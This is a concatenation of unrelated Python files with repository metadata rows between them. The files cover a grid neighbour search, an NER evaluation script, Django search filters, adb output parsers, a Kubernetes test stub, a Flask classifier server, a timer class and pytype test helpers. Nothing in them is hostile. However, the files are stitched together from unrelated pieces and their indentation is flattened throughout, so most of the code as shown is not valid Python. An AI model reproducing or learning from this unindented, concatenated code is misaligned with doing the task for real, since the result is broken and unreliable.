# To only search neighbouring cells, we search through -1 to 1.
search_min = -1
search_max = 2
neighbour_list = []
# Neighbors are only invalid if they are outside the boards bounds
# This logic basically filters them out.
for row in range(search_min,search_max):
for column in range(search_min,search_max):
neighbour_row = check_row + row
neighbour_column = check_column + column
valid_neighbour = True
if (neighbour_row) == check_row and (neighbour_column) == check_column:
valid_neighbour = False
if (neighbour_row) < 0 or (neighbour_row) >= self.rows:
valid_neighbour = False
if (neighbour_column) < 0 or (neighbour_column) >= self.columns:
valid_neighbour = False
if valid_neighbour:
neighbour_list.append(self.grid[neighbour_row][neighbour_column])
return neighbour_list
| 35.186047 | 104 | 0.564662 |
a2e1a18fb0392ac84e691b3ab2220a441ecf5347
| 4,195 |
py
|
Python
|
feature_pu_model_evl.py
|
CharrierFlorent/BioNER-PU-learning
|
9a2003d5eeffa1997550199a9dc541cbd074f7e3
|
[
"Apache-2.0"
] | 139 |
2019-05-27T02:14:39.000Z
|
2022-03-28T09:26:17.000Z
|
feature_pu_model_evl.py
|
marvinstanley/LexiconNER
|
8814d2e4badc5ec25dff35ea4a3e98372256ac7c
|
[
"Apache-2.0"
] | 12 |
2019-06-18T08:13:10.000Z
|
2022-02-09T12:33:17.000Z
|
feature_pu_model_evl.py
|
marvinstanley/LexiconNER
|
8814d2e4badc5ec25dff35ea4a3e98372256ac7c
|
[
"Apache-2.0"
] | 29 |
2019-05-26T08:47:15.000Z
|
2020-10-11T09:11:46.000Z
|
# -*- coding: utf-8 -*-
# @Time : 2018/8/7 16:48
# @Author : Xiaoyu Xing
# @File : feature_pu_model_evl.py
from utils.feature_pu_model_utils import FeaturedDetectionModelUtils
from utils.data_utils import DataPrepare
import torch
import argparse
from feature_pu_model import PULSTMCNN, Trainer
from sub_model import CharCNN, CaseNet, WordNet, FeatureNet
import numpy as np
torch.manual_seed(1013)
parser = argparse.ArgumentParser(description="PU NER EVL")
parser.add_argument('--model', default="", help='saved model name')
parser.add_argument('--output', default=0, help='write the test result, set 1 for writing result to file')
parser.add_argument('--set', type=int, default=0, help='test set or valid set')
parser.add_argument('--flag', default="PER", help='entity type (PER/LOC/ORG/MISC)')
parser.add_argument('--lr_rate', type=int, default=1e-4, help='learning rate')
parser.add_argument('--dataset', default="conll2003", help='name of the dataset')
parser.add_argument('--type', default="bnpu", help='pu learning type (bnpu/bpu/upu)')
args = parser.parse_args()
dp = DataPrepare(args.dataset)
mutils = FeaturedDetectionModelUtils(dp)
trainSet, validSet, testSet, prior = mutils.load_dataset(args.flag, args.dataset, 1.0)
setIter = [testSet, validSet]
detectionSet = setIter[args.set]
fileNameIter = ["data/" + args.dataset + "/test.txt", "data/" + args.dataset + "/valid.txt"]
fileName = fileNameIter[args.set]
charcnn = CharCNN(dp.char2Idx)
wordnet = WordNet(dp.wordEmbeddings, dp.word2Idx)
casenet = CaseNet(dp.caseEmbeddings, dp.case2Idx)
featurenet = FeatureNet()
pulstmcnn = PULSTMCNN(dp, charcnn, wordnet, casenet, featurenet, 150, 200, 1, 0.5)
if torch.cuda.is_available:
charcnn.cuda()
wordnet.cuda()
casenet.cuda()
featurenet.cuda()
pulstmcnn.cuda()
pred_test = []
corr_test = []
prob_test = []
trainer = Trainer(pulstmcnn, prior, 0, 1, 1e-4, 4)
pulstmcnn.load_state_dict(torch.load(args.model))
for step, (x_word_test_batch, x_case_test_batch, x_char_test_batch, x_feature_batch, y_test_batch) in enumerate(
mutils.iterateSet(detectionSet, batchSize=100, mode="TEST", shuffle=False)):
testBatch = [x_word_test_batch, x_case_test_batch, x_char_test_batch, x_feature_batch]
correcLabels = []
for x in y_test_batch:
for xi in x:
correcLabels.append(xi)
lengths = [len(x) for x in x_word_test_batch]
predLabels, probLabels = trainer.test(testBatch, lengths)
correcLabels = np.array(correcLabels)
assert len(predLabels) == len(correcLabels) == len(probLabels)
start = 0
for i, l in enumerate(lengths):
end = start + l
p = predLabels[start:end]
c = correcLabels[start:end]
r = probLabels[start:end]
pred_test.append(p)
corr_test.append(c)
prob_test.append(r)
start = end
assert len(pred_test) == len(corr_test) == len(prob_test)
test_sentences = dp.read_origin_file(fileName)
test_words = []
test_efs = []
for s in test_sentences:
temp = []
temp2 = []
for word, ef, lf in s:
temp.append(word)
temp2.append(ef)
test_words.append(temp)
test_efs.append(temp2)
newSentencesTest = []
for i, s in enumerate(test_words):
sent = []
for j, item in enumerate(s):
sent.append([item, test_efs[i][j], pred_test[i][j], prob_test[i][j]])
newSentencesTest.append(sent)
newSentencesTest_, newLabelsTest, newPredsTest, newProbTest = dp.wordLevelGeneration2(newSentencesTest)
p, r, f1 = dp.compute_precision_recall_f1(newLabelsTest, newPredsTest, args.flag, 1)
print("Precision: {}, Recall: {}, F1: {}".format(p, r, f1))
if args.output:
outputFile = "result/" + args.type + "_feature_pu_" + args.dataset + "_" + args.flag + "_" + str(args.set) + ".txt"
with open(outputFile, "w") as fw:
for i, sent in enumerate(test_words):
preds = pred_test[i]
probs = prob_test[i]
corrs = test_efs[i]
for j, w in enumerate(sent):
pred = preds[j]
corr = corrs[j]
prob = probs[j]
fw.write(("{} {} {} {}\n").format(w, corr, pred, prob))
fw.write("\n")
| 35.854701 | 119 | 0.67652 |
9af66f013c14bd0ec1c49b79206bc8f4b50daff4
| 761 |
py
|
Python
|
geo/filters.py
|
cmc333333/mapusaurus
|
1d7ccef90d0ed832d52f797cbe68057057cd0177
|
[
"CC0-1.0"
] | null | null | null |
geo/filters.py
|
cmc333333/mapusaurus
|
1d7ccef90d0ed832d52f797cbe68057057cd0177
|
[
"CC0-1.0"
] | 55 |
2018-02-09T04:11:31.000Z
|
2018-07-04T18:30:29.000Z
|
geo/filters.py
|
cmc333333/mapusaurus
|
1d7ccef90d0ed832d52f797cbe68057057cd0177
|
[
"CC0-1.0"
] | null | null | null |
import django_filters
from django.contrib.postgres.search import TrigramSimilarity
from geo.models import CoreBasedStatisticalArea, County
def filter_to_search_term(queryset, name, value):
return queryset\
.annotate(similarity=TrigramSimilarity("name", value))\
.filter(similarity__gte=0.01)\
.order_by("-similarity")
class CBSAFilters(django_filters.FilterSet):
q = django_filters.CharFilter(method=filter_to_search_term)
class Meta:
model = CoreBasedStatisticalArea
fields = {"geoid": ["in"]}
class CountyFilters(django_filters.FilterSet):
q = django_filters.CharFilter(method=filter_to_search_term)
class Meta:
model = County
fields = {"geoid": ["in"], "state": ["exact"]}
| 27.178571 | 63 | 0.712221 |
47852fc2662970b3f8f435ab1355ebabfecea169
| 3,776 |
py
|
Python
|
interpret_adb.py
|
CodeBishop/beholder
|
ca25d961c534c0a8ccc1ce2c9cec11b791ed2976
|
[
"MIT"
] | null | null | null |
interpret_adb.py
|
CodeBishop/beholder
|
ca25d961c534c0a8ccc1ce2c9cec11b791ed2976
|
[
"MIT"
] | null | null | null |
interpret_adb.py
|
CodeBishop/beholder
|
ca25d961c534c0a8ccc1ce2c9cec11b791ed2976
|
[
"MIT"
] | null | null | null |
import re
def interpretProcessInfo(commandOutput, appId):
'''Takes in the output of a `ps -wel` and a process name, returns a string describing that process or None if the process was not found'''
processDict = interpretProcessInfoIntoDict(commandOutput, appId)
if processDict != None:
return processDict['cmd'] + " (pid " + processDict['pid'] + ") " + processDict['runTime'] + " Nice: " + processDict['nice']
return None
def interpretProcessInfoIntoDict(commandOutput, appId):
'''Takes in the output of a `ps -wel` and a process name, returns a dictionary of info about that process or None if the process was not found'''
processDict = {}
for line in commandOutput.split('\n'):
if line.find(appId) != -1:
values = [s for s in line.split()]
processDict['pid'] = values[3]
processDict['nice'] = values[7]
processDict['runTime'] = values[12]
processDict['cmd'] = values[13]
return processDict
return None
def interpretActivityInfo(commandOutput, appId):
'''Takes in the output of a `dumpsys activity <appId>` and an application ID, returns a string describing that app's Activity'''
activityDict = {}
for line in commandOutput.split('\n'):
if 'ACTIVITY' in line:
activityDict['activityName'] = line.split()[1]
activityDict['pidInfo'] = line.split()[3]
if 'mResumed' in line:
flagEntries = line.split()
activityDict['resumedFlag'] = 'true' in flagEntries[0]
activityDict['stoppedFlag'] = 'true' in flagEntries[1]
activityDict['finishedFlag'] = 'true' in flagEntries[2]
if 'mLastFrameTime' in line:
activityDict['timeSinceLastRender'] = re.search(r"\b.*(\b\d+) ms ago\)", line).group(1)
if activityDict != {}:
activityString = ""
activityString += activityDict['activityName'] + " (" + activityDict['pidInfo'] + ")"
if 'timeSinceLastRender' in activityDict.keys() and activityDict['timeSinceLastRender'] != None:
activityString += " updated " + activityDict['timeSinceLastRender'] + " ms ago"
activityString += " state: "
if 'resumedFlag' in activityDict.keys() and activityDict['resumedFlag']:
activityString += "foreground "
if 'stoppedFlag' in activityDict.keys() and activityDict['stoppedFlag']:
activityString += "stopped "
if 'finishedFlag' in activityDict.keys() and activityDict['finishedFlag']:
activityString += "finished "
return activityString
return ""
'''Replaces this command:
hero deaths % watch -n 0.3 'adb shell dumpsys activity <appId> | grep -E "mResumed|astFrameT|hasService|ebView|CTIVITY"'
'''
return "hello"
def interpretRunningServiceList(commandOutput, appId):
'''Takes in the output of a `dumpsys activity services <appId>` and an application ID, returns a list of strings naming all the Android services that app is running'''
output = commandOutput.split('\n')
# Strip out newlines
for i in range(len(output)):
output[i] = output[i].strip()
# Filter out everything but the active ServiceRecords for the specified app
filteredOutput = []
for line in output:
if '* ServiceRecord' in line and appId in line:
filteredOutput.append(line)
# Strip the ServiceRecord lines down to just the last part of the Service identifier
serviceNames = []
for line in filteredOutput:
# Take last part of Service identifier and truncate final char (should be a close brace)
# TODO: Rewrite this as a regex
serviceNames.append(line.split('.')[-1][:-1])
return serviceNames
| 48.410256 | 171 | 0.645392 |
29a86c66d2b0477164fa489b3c7f8439735a6ec8
| 589 |
py
|
Python
|
sdk/datamigration/azure-mgmt-datamigration/azure/mgmt/datamigration/aio/__init__.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2,728 |
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/datamigration/azure-mgmt-datamigration/azure/mgmt/datamigration/aio/__init__.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 17,773 |
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/datamigration/azure-mgmt-datamigration/azure/mgmt/datamigration/aio/__init__.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1,916 |
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._data_migration_management_client import DataMigrationManagementClient
__all__ = ['DataMigrationManagementClient']
| 53.545455 | 94 | 0.601019 |
6d754deb817aa614eed207dfb0aea08702501257
| 946 |
py
|
Python
|
kubernetes/test/test_v1_endpoint_port.py
|
redjohn/python
|
5e512ff564c244c50cab780d821542ed56aa965a
|
[
"Apache-2.0"
] | 1 |
2019-04-14T23:51:35.000Z
|
2019-04-14T23:51:35.000Z
|
kubernetes/test/test_v1_endpoint_port.py
|
redjohn/python
|
5e512ff564c244c50cab780d821542ed56aa965a
|
[
"Apache-2.0"
] | null | null | null |
kubernetes/test/test_v1_endpoint_port.py
|
redjohn/python
|
5e512ff564c244c50cab780d821542ed56aa965a
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.14.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1_endpoint_port import V1EndpointPort
class TestV1EndpointPort(unittest.TestCase):
""" V1EndpointPort unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1EndpointPort(self):
"""
Test V1EndpointPort
"""
# FIXME: construct object with mandatory attributes with example values
#model = kubernetes.client.models.v1_endpoint_port.V1EndpointPort()
pass
if __name__ == '__main__':
unittest.main()
| 21.022222 | 105 | 0.704017 |
6276e19e31d59a19d2db936e5b7464317ec3e301
| 1,531 |
py
|
Python
|
Chapter09/server_ckpt.py
|
PacktPublishing/Deep-Learning-with-PyTorch-Lightning
|
4eb607200281323383413eaad4fcb7a3feaa7502
|
[
"MIT"
] | 22 |
2021-08-31T21:59:02.000Z
|
2022-03-29T21:26:31.000Z
|
Chapter09/server_ckpt.py
|
PacktPublishing/-Getting-Started-with-PyTorch-Lightning
|
4eb607200281323383413eaad4fcb7a3feaa7502
|
[
"MIT"
] | 6 |
2021-11-20T10:11:30.000Z
|
2022-03-30T06:45:05.000Z
|
Chapter09/server_ckpt.py
|
PacktPublishing/-Getting-Started-with-PyTorch-Lightning
|
4eb607200281323383413eaad4fcb7a3feaa7502
|
[
"MIT"
] | 17 |
2021-04-10T16:26:08.000Z
|
2022-03-17T07:45:52.000Z
|
# Important Note:
#
# For your convenience, we have copied the notebook named "Cats and Dogs Classifier.ipynb" from Chapter 2 to the
# GitHub folder for this chapter. Only change in the notebook is that the ImageClassifier class is now defined in its own
# file named "image_classifier.py"; so we have removed that cell and added an import statement instead.
#
# Run the "Cats and Dogs Classifier.ipynb" notebook in this folder before launching this server program.
import torch.nn.functional as functional
import torchvision.transforms as transforms
from PIL import Image
from flask import Flask, request, jsonify
from image_classifier import ImageClassifier
model = ImageClassifier.load_from_checkpoint("./lightning_logs/version_0/checkpoints/epoch=99-step=3199.ckpt")
IMAGE_SIZE = 64
def transform_image(img):
transform = transforms.Compose([
transforms.Resize(IMAGE_SIZE),
transforms.CenterCrop(IMAGE_SIZE),
transforms.ToTensor()
])
return transform(img).unsqueeze(0)
def get_prediction(img):
result = model(img)
return functional.softmax(result, dim=1)[:, 1].tolist()[0]
app = Flask(__name__)
@app.route("/predict", methods=["POST"])
def predict():
img_file = request.files['image']
img = Image.open(img_file.stream)
img = transform_image(img)
prediction = get_prediction(img)
if prediction >= 0.5:
cat_or_dog = "dog"
else:
cat_or_dog = "cat"
return jsonify({'cat_or_dog': cat_or_dog})
if __name__ == '__main__':
app.run()
| 31.244898 | 121 | 0.727629 |
53bbe4dbfa3148c14c08561e4190ff438ecfc006
| 2,129 |
py
|
Python
|
nfv/nfv-common/nfv_common/timers/_timer.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | null | null | null |
nfv/nfv-common/nfv_common/timers/_timer.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | null | null | null |
nfv/nfv-common/nfv_common/timers/_timer.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2015-2016 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
from nfv_common import debug
from nfv_common.timers._timestamp import get_monotonic_timestamp_in_ms
DLOG = debug.debug_get_logger('nfv_common.timers.timer')
class Timer(object):
"""
Timer
"""
_id = 1
def __init__(self, timer_name, initial_delay_secs, interval_secs,
callback, *callback_args, **callback_kwargs):
"""
Create timer
"""
self._timer_id = Timer._id
self._timer_name = timer_name
self._interval_secs = interval_secs
self._arm_timestamp = get_monotonic_timestamp_in_ms()
self._callback = callback(*callback_args, **callback_kwargs)
if initial_delay_secs is None:
self._next_expiry_in_secs = interval_secs
else:
self._next_expiry_in_secs = initial_delay_secs
Timer._id += 1
@property
def timer_id(self):
"""
Returns the unique timer identifier
"""
return self._timer_id
@property
def timer_name(self):
"""
Returns the name of the timer
"""
return self._timer_name
def reschedule(self, interval_secs):
"""
Reschedule a timer
"""
self._interval_secs = interval_secs
self._next_expiry_in_secs = self._interval_secs
def callback(self, now_ms):
"""
Execute the callback associated with this timer if enough
time has elapsed
"""
rearm = True
secs_expired = (now_ms - self._arm_timestamp) / 1000
if secs_expired > self._next_expiry_in_secs:
DLOG.verbose("Timer %s with timer id %s fired." % (self._timer_name,
self._timer_id))
try:
self._callback.send(self._timer_id)
self._arm_timestamp = get_monotonic_timestamp_in_ms()
self._next_expiry_in_secs = self._interval_secs
except StopIteration:
rearm = False
return rearm
| 28.77027 | 80 | 0.600282 |
f05f0a5651b3001a47bbcc7a5be9e6e0e6882b1c
| 20,240 |
py
|
Python
|
pytype/tests/test_inference.py
|
yang/pytype-hack
|
093d69c9a6f6144f0209cdeb8eed6c7e832bbee0
|
[
"Apache-2.0"
] | null | null | null |
pytype/tests/test_inference.py
|
yang/pytype-hack
|
093d69c9a6f6144f0209cdeb8eed6c7e832bbee0
|
[
"Apache-2.0"
] | null | null | null |
pytype/tests/test_inference.py
|
yang/pytype-hack
|
093d69c9a6f6144f0209cdeb8eed6c7e832bbee0
|
[
"Apache-2.0"
] | null | null | null |
"""Common methods for tests of infer.py."""
import logging
import re
import sys
import textwrap
from pytype import convert_structural
from pytype import errors
from pytype import infer
from pytype.pyc import loadmarshal
from pytype.pytd import optimize
from pytype.pytd import pytd
from pytype.pytd import utils as pytd_utils
from pytype.pytd.parse import parser
from pytype.pytd.parse import visitors
import unittest
log = logging.getLogger(__name__)
# Make this false if you need to run the debugger inside a test.
CAPTURE_STDOUT = ("-s" not in sys.argv)
class Infer(object):
"""Calls infer, produces useful output on failure.
Typically called indirectly from InferenceTest.Infer, which has
the same args.
This implements the 'with' protocol. Typical use is (where 'self'
is the test instance, e.g. test_inference.InferenceTest (below)):
with self.Infer(src) as ty:
self.assertOnlyHasReturnType(ty.Lookup("f"), self.bool)
This code catches exceptions that happen inside Infer(src), so no need to test
for ty being non-None (although if it is None, the failed method call will be
caught and reported nicely).
Comments on the flags:
The type inferencer has three layers:
1. Run concrete bytecode
2. Run abstract bytecode
3. Convert ("solve") unknowns
It's useful to be able to test all three things in isolation.
Solving unknowns in a test where you don't expect unknowns will give you
more complex debug output and make tests slower. It might also be confusing,
since the output you're checking is the one from the type converter, causing
you to suspect the latter as the cause of bugs even though it's not actually
doing anything.
As for "deep": this causes all public functions to be called with
__any_object__ args, so for precise control, you can set deep=False
and explicitly make the calls.
"""
# TODO(pludemann): This is possibly a slightly less magical paradigm:
# with self.Inferencer(deep=False, solve_unknowns=False) as ty:
# ty = i.Infer("""....""")
# self.assertOnlyHasReturnType(ty.Lookup(...), ...)
def __init__(self, test, srccode, deep=False,
solve_unknowns=False, extract_locals=False,
extra_verbose=False, report_errors=True, **kwargs):
"""Constructor for Infer.
Args:
test: the Testcase (see inferenceTest.Infer)
srccode: the Python source code to do type inferencing on
deep: see class comments (assume --api - analyize all methods, even those
that don't have a caller)
solve_unknowns: try to solve for all ~unknown types
extract_locals: strip ~unknown types from the output pytd
extra_verbose: extra intermeidate output (for debugging)
report_errors: Whether to fail if the type inferencer reports any erros.
**kwargs: Additional options to pass through to infer_types().
"""
# TODO(pludemann): There are eight possible combinations of these three
# boolean flags. Do all of these combinations make sense? Or would it be
# possible to simplify this into something like a "mode" parameter:
# mode="solve" => deep=True, solve_unknowns=True
# mode="structural" => deep=True, solve_unknowns=False, extract_locals=False
# mode="deep" => deep=True, solve_unknowns=False, extract_locals=True
# mode="main" => deep=False, solve_unknowns=False, extract_locals=True
self.srccode = textwrap.dedent(srccode)
self.inferred = None
self.optimized_types = None
self.extract_locals = None # gets set if extract_locals is set (below)
self.extra_verbose = extra_verbose
self.canonical_types = None
# We need to catch any exceptions here and preserve them for __exit__.
# Exceptions raised in the body of 'with' will be presented to __exit__.
try:
self.types = test._InferAndVerify(
self.srccode, deep=deep, cache_unknowns=True,
solve_unknowns=solve_unknowns,
report_errors=report_errors, **kwargs)
self.inferred = self.types
if extract_locals:
# Rename "~unknown" to "?"
self.types = self.types.Visit(visitors.RemoveUnknownClasses())
# Remove "~list" etc.:
self.types = convert_structural.extract_local(self.types)
self.extract_locals = self.types
# TODO(pludemann): These flags are the same as those in main.py; there
# should be a way of ensuring that they're the same.
self.types = self.optimized_types = optimize.Optimize(
self.types, lossy=False, use_abcs=False,
max_union=7, remove_mutable=False)
self.types = self.canonical_types = pytd_utils.CanonicalOrdering(
self.types)
except Exception: # pylint: disable=broad-except
self.types = None
if not self.__exit__(*sys.exc_info()):
raise
def __enter__(self):
return self.types
def __exit__(self, error_type, value, traceback):
if not error_type:
return
log.error("*** unittest ERROR *** %s: %s", error_type.__name__, value)
_PrintErrorDebug("source", self.srccode)
if self.extra_verbose and self.inferred:
_PrintErrorDebug("inferred PyTD", pytd.Print(self.inferred))
if self.extra_verbose and self.optimized_types:
_PrintErrorDebug("optimized PyTD", pytd.Print(self.optimized_types))
if self.extra_verbose and self.extract_locals:
_PrintErrorDebug("extract_locals (removed unknown) PyTD",
pytd.Print(self.extract_locals))
if self.canonical_types:
_PrintErrorDebug("canonical PyTD", pytd.Print(self.canonical_types))
return False # re-raise the exception that was passed in
class InferenceTest(unittest.TestCase):
"""Base class for implementing tests that check PyTD output."""
PYTHON_VERSION = (2, 7) # can be overwritten by subclasses
def setUp(self):
self.bool = pytd.ClassType("bool")
self.dict = pytd.ClassType("dict")
self.float = pytd.ClassType("float")
self.complex = pytd.ClassType("complex")
self.int = pytd.ClassType("int")
if self.PYTHON_VERSION[0] == 2:
self.long = pytd.ClassType("long")
self.list = pytd.ClassType("list")
self.none_type = pytd.ClassType("NoneType")
self.object = pytd.ClassType("object")
self.set = pytd.ClassType("set")
self.frozenset = pytd.ClassType("frozenset")
self.str = pytd.ClassType("str")
self.bytes = pytd.ClassType("bytes")
self.bytearray = pytd.ClassType("bytearray")
self.tuple = pytd.ClassType("tuple")
self.unicode = pytd.ClassType("unicode")
self.generator = pytd.ClassType("generator")
self.function = pytd.ClassType("function")
self.anything = pytd.AnythingType()
self.nothing = pytd.NothingType()
self.module = pytd.ClassType("module")
self.file = pytd.ClassType("file")
# The various union types use pytd_utils.CanonicalOrdering()'s ordering:
self.intorstr = pytd.UnionType((self.int, self.str))
self.strorunicodeorbytes = pytd.UnionType(
(self.str, self.unicode, self.bytes))
self.intorfloat = pytd.UnionType((self.float, self.int))
self.intorfloatorstr = pytd.UnionType((self.float, self.int, self.str))
self.complexorstr = pytd.UnionType((self.complex, self.str))
# TODO(pludemann): fix the boolorintor... stuff when __builtins__
# is modified to exclude bool from the result
if self.PYTHON_VERSION[0] == 3:
self.intorfloatorlong = self.intorfloat
self.intorfloatorlongorcomplex = pytd.UnionType(
(self.int, self.float, self.complex))
else:
self.intorfloatorlong = pytd.UnionType((self.int, self.float, self.long))
self.boolorintorfloatorlongorcomplex = pytd.UnionType(
(self.bool, self.int, self.float, self.long, self.complex))
self.int_tuple = pytd.HomogeneousContainerType(self.tuple, (self.int,))
self.nothing_tuple = pytd.HomogeneousContainerType(self.tuple,
(self.nothing,))
self.intorfloat_tuple = pytd.HomogeneousContainerType(self.tuple,
(self.intorfloat,))
self.int_set = pytd.HomogeneousContainerType(self.set, (self.int,))
self.intorfloat_set = pytd.HomogeneousContainerType(self.set,
(self.intorfloat,))
# TODO(pludemann): simplify this (test_and2)
self.unknown_frozenset = pytd.HomogeneousContainerType(
self.frozenset, (self.anything,))
self.float_frozenset = pytd.HomogeneousContainerType(self.frozenset,
(self.float,))
self.empty_frozenset = pytd.HomogeneousContainerType(self.frozenset,
(self.nothing,))
self.int_list = pytd.HomogeneousContainerType(self.list, (self.int,))
self.str_list = pytd.HomogeneousContainerType(self.list, (self.str,))
self.intorfloat_list = pytd.HomogeneousContainerType(self.list,
(self.intorfloat,))
self.intorstr_list = pytd.HomogeneousContainerType(self.list,
(self.intorstr,))
self.anything_list = pytd.HomogeneousContainerType(self.list,
(self.anything,))
self.nothing_list = pytd.HomogeneousContainerType(self.list,
(self.nothing,))
self.int_int_dict = pytd.GenericType(self.dict, (self.int, self.int))
self.int_str_dict = pytd.GenericType(self.dict, (self.int, self.str))
self.str_int_dict = pytd.GenericType(self.dict, (self.str, self.int))
self.nothing_nothing_dict = pytd.GenericType(self.dict,
(self.nothing, self.nothing))
# For historical reasons (byterun), this method name is snakecase:
# TODO(kramm): Rename this function.
# pylint: disable=invalid-name
def assertNoErrors(self, code, raises=None,
pythonpath=(), find_pytd_import_ext=".pytd",
report_errors=True):
"""Run an inference smoke test for the given code."""
if raises is not None:
# TODO(kramm): support this
log.warning("Ignoring 'raises' parameter to assertNoErrors")
errorlog = errors.ErrorLog()
unit = infer.infer_types(
textwrap.dedent(code), self.PYTHON_VERSION, errorlog,
deep=False, solve_unknowns=False, reverse_operators=True,
pythonpath=pythonpath, find_pytd_import_ext=find_pytd_import_ext,
cache_unknowns=True)
if report_errors and errorlog.errors:
errorlog.print_to_stderr()
self.fail("Inferencer found %d errors" % len(errorlog))
unit.Visit(visitors.VerifyVisitor())
return pytd_utils.CanonicalOrdering(unit)
def assertNoCrash(self, code, **kwargs):
self.assertNoErrors(code, report_errors=False, **kwargs)
def InferAndCheck(self, code):
errorlog = errors.ErrorLog()
unit = infer.infer_types(
textwrap.dedent(code), self.PYTHON_VERSION, errorlog, deep=True,
reverse_operators=True, cache_unknowns=True)
unit.Visit(visitors.VerifyVisitor())
return pytd_utils.CanonicalOrdering(unit), errorlog
def InferFromFile(self, filename, pythonpath, find_pytd_import_ext=".pytd"):
errorlog = errors.ErrorLog()
with open(filename, "rb") as fi:
unit = infer.infer_types(fi.read(), self.PYTHON_VERSION, errorlog,
filename=filename, cache_unknowns=True,
pythonpath=pythonpath,
find_pytd_import_ext=find_pytd_import_ext)
unit.Visit(visitors.VerifyVisitor())
return pytd_utils.CanonicalOrdering(unit)
@classmethod
def SignatureHasReturnType(cls, sig, return_type):
for desired_type in pytd_utils.UnpackUnion(return_type):
if desired_type == return_type:
return True
elif isinstance(sig.return_type, pytd.UnionType):
return desired_type in sig.return_type.type_list
else:
return False
@classmethod
def HasSignature(cls, func, target):
for sig in func.signatures:
if (target.params == tuple(p.type for p in sig.params) and
cls.SignatureHasReturnType(sig, target.return_type)):
return True
return False
@classmethod
def HasExactSignature(cls, func, target):
for sig in func.signatures:
if (target.params == tuple(p.type for p in sig.params) and
target.return_type == sig.return_type):
return True
return False
def assertHasOnlySignatures(self, func, *sigs):
self.assertIsInstance(func, pytd.Function)
for parameter_types, return_type in sigs:
target = pytd.Signature(tuple(parameter_types), return_type, (), (),
False)
if not self.HasExactSignature(func, target):
self.fail("Could not find signature: {name}{target} in {func}".
format(name=func.name,
target=pytd.Print(target),
func=pytd.Print(func)))
self.assertEqual(len(func.signatures), len(sigs),
"{func} has the wrong number of signatures ({has}), "
"expected {expect}".
format(func=func,
has=len(func.signatures), expect=len(sigs)))
def assertHasSignature(self, func, parameter_types, return_type):
target = pytd.Signature(tuple(parameter_types), return_type, (), (), False)
if not self.HasSignature(func, target):
# TODO(pludemann): don't assume function is 'f'
self.fail("Could not find signature: f{} in {} ({} in {})".
format(pytd.Print(target), pytd.Print(func), target, func))
def assertNotHasSignature(self, func, parameter_types, return_type):
target = pytd.Signature(tuple(parameter_types), return_type, (), (), False)
if self.HasSignature(func, target):
# TODO(pludemann): don't assume function is 'f'
self.fail("Found signature: f{} -> {} in {}".
format(pytd.Print(target), pytd.Print(func)))
def assertOnlyHasReturnType(self, func, t):
"""Test that a given return type is the only one."""
ret = pytd_utils.JoinTypes(sig.return_type
for sig in func.signatures)
self.assertEquals(t, ret,
"Return type %r != %r" % (pytd.Print(t),
pytd.Print(ret)))
def assertHasReturnType(self, func, t):
"""Test that a given return type is present. Ignore extras."""
ret = pytd_utils.JoinTypes(sig.return_type
for sig in func.signatures)
if isinstance(ret, pytd.UnionType):
self.assertIn(t, ret.type_list,
"Return type %r not found in %r" % (pytd.Print(t),
pytd.Print(ret)))
else:
self.assertEquals(t, ret,
"Return type %r != %r" % (pytd.Print(ret),
pytd.Print(t)))
def assertHasAllReturnTypes(self, func, types):
"""Test that all given return types are present. Ignore extras."""
for t in types:
self.assertHasReturnType(func, t)
def assertIsIdentity(self, func):
"""Tests whether a given function is equivalent to the identity function."""
self.assertGreaterEqual(len(func.signatures), 1)
for sig in func.signatures:
self.assertEquals(len(sig.params), 1)
param1, = sig.params
self.assertEquals(param1.type, sig.return_type,
"Not identity: %r" % pytd.Print(func))
def assertErrorLogContains(self, errorlog, regexp):
for error in errorlog:
if re.compile(regexp, re.I | re.S).search(str(error)):
return
print >>sys.stderr, "Couldn't find regexp %r in errors:" % regexp
errorlog.print_to_stderr()
raise AssertionError("Couldn't find regexp %r in errors" % regexp)
def assertErrorLogDoesNotContain(self, errorlog, regexp):
for error in errorlog:
if re.compile(regexp, re.I | re.S).search(str(error)):
print >>sys.stderr, "Found regexp %r in errors:" % regexp
errorlog.print_to_stderr()
raise AssertionError("Found regexp %r in errors" % regexp)
def Infer(self, srccode, deep=False, solve_unknowns=False,
extract_locals=False, extra_verbose=False,
report_errors=True, **kwargs):
# Wraps Infer object to make it seem less magical
# See class Infer for more on the arguments
return Infer(self, srccode=srccode, deep=deep,
solve_unknowns=solve_unknowns, extract_locals=extract_locals,
extra_verbose=extra_verbose, report_errors=report_errors,
**kwargs)
def _InferAndVerify(self, src, report_errors=False, **kwargs):
"""Infer types for the source code treating it as a module.
Used by class Infer (which sets up a 'with' framework)
Args:
src: The source code of a module. Treat it as "__main__".
report_errors: Whether to fail if the type inferencer reports any errors
in the program.
**kwargs: Keyword paramters to pass through to the type inferencer.
Raises:
AssertionError: If report_errors is True and we found errors.
Returns:
A pytd.TypeDeclUnit
"""
